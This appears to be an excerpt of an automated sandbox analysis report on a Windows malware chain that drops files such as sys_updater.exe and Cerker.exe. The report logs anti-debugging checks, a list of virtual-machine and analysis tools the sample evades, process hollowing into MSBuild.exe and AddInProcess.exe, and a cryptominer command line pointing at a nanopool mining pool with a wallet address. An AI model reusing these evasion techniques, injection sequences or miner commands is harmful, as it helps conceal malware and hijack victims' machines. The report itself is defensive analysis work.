Instructions/sec5030Emulated Instructions Cost
                            Source: sys_updater.exe, 0000001F.00000003.2812365252.0000020E47A48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number48
                            Source: sys_updater.exe, 00000022.00000003.2924737972.00000237D32AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2923888088.00000237D32AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2924061808.00000237D32AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2925669194.00000237D3292000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2924910130.00000237D32AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Reques
                            Source: sys_updater.exe, 0000001F.00000003.2895586429.0000020E494BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                            Source: sys_updater.exe, 0000001F.00000003.2895586429.0000020E494BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2152912193.00000234D413D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervis
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2152912193.00000234D413D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
                            Source: sys_updater.exe.26.dr Binary or memory string: VGAuthService.exe.exehollows_hunter32procexp64.exeprocexp.exeProcmon.exeProcmon64.exepestudio.exeKsDumper.exeprl_cc.exeprl_tools.exepe-sieve64.exeMoneta64.exefakenet.exeWireshark.exeVBoxService.exeVMwareUser.exevmtoolsd.exeVMwareTray.exevmsrvc.exeVBoxTray.exeC:\Users\Hassp\.cargo\registry\src\index.crates.io-6f17d22bba15001f\antilysis-0.1.2\src\lib.rs>
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partition:C\
                            Source: sys_updater.exe, 0000001B.00000003.2716504678.00000159F3435000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2721618394.00000159F3435000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 0
                            Source: sys_updater.exe, 0000001B.00000003.2711441685.00000159F342B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2713187842.00000159F3435000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2713513597.00000159F3435000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec48
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration ServiceI
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2154673474.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2153449987.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2154400001.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2154147432.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2153766805.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes+
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Servicel.P
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipesui
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Process information queried: ProcessInformation
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F1434 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_005F1434
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F6600 mov eax, dword ptr fs:[00000030h] | 0_2_005F6600
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005FFF7D mov eax, dword ptr fs:[00000030h] | 0_2_005FFF7D
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005FFF39 mov eax, dword ptr fs:[00000030h] | 0_2_005FFF39
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_00556600 mov eax, dword ptr fs:[00000030h] | 3_2_00556600
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_0055FF7D mov eax, dword ptr fs:[00000030h] | 3_2_0055FF7D
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_0055FF39 mov eax, dword ptr fs:[00000030h] | 3_2_0055FF39
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_00608004 GetProcessHeap | 0_2_00608004
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F1434 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_005F1434
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F4C93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_005F4C93
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F1597 SetUnhandledExceptionFilter | 0_2_005F1597
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F16B1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_005F16B1
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_00551434 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_00551434
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_00554C93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_00554C93
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_00551597 SetUnhandledExceptionFilter | 3_2_00551597
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_005516B1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 3_2_005516B1
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C78C45A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 10_2_6C78C45A
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C7884BA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 10_2_6C7884BA
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C787FE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 10_2_6C787FE1
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.f363d4.1.raw.unpack, NativeLibrary.cs | Reference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsExtensions.cs | Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.146ecf4.5.raw.unpack, Program.cs | Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005D4780 CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,VirtualAllocEx,GetLastError,VirtualAllocEx,WriteProcessMemory,SetThreadContext,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,ResumeThread | 0_2_005D4780
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Thread register set: target process: 6560
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Thread register set: target process: 2704
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: DF88456010
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: A95F7D8010
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 454000
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47A000
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D09008
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Process created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Process created: C:\Users\user\AppData\Local\Temp\gtxkvh.exe "C:\Users\user\AppData\Local\Temp\gtxkvh.exe"
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exe | Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AE9000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BEC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E0346C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: MSBuild.exe, 0000000C.00000002.1842346912.00000000030B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: GetProgmanWindow
Source: MSBuild.exe, 0000000C.00000002.1842346912.00000000030B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SetProgmanWindow
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F0AD3 cpuid | 0_2_005F0AD3
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 0_2_00607854
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: GetLocaleInfoW | 0_2_00607AA7
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 0_2_00607BCD
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: GetLocaleInfoW | 0_2_005FD43D
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: GetLocaleInfoW | 0_2_00607CD3
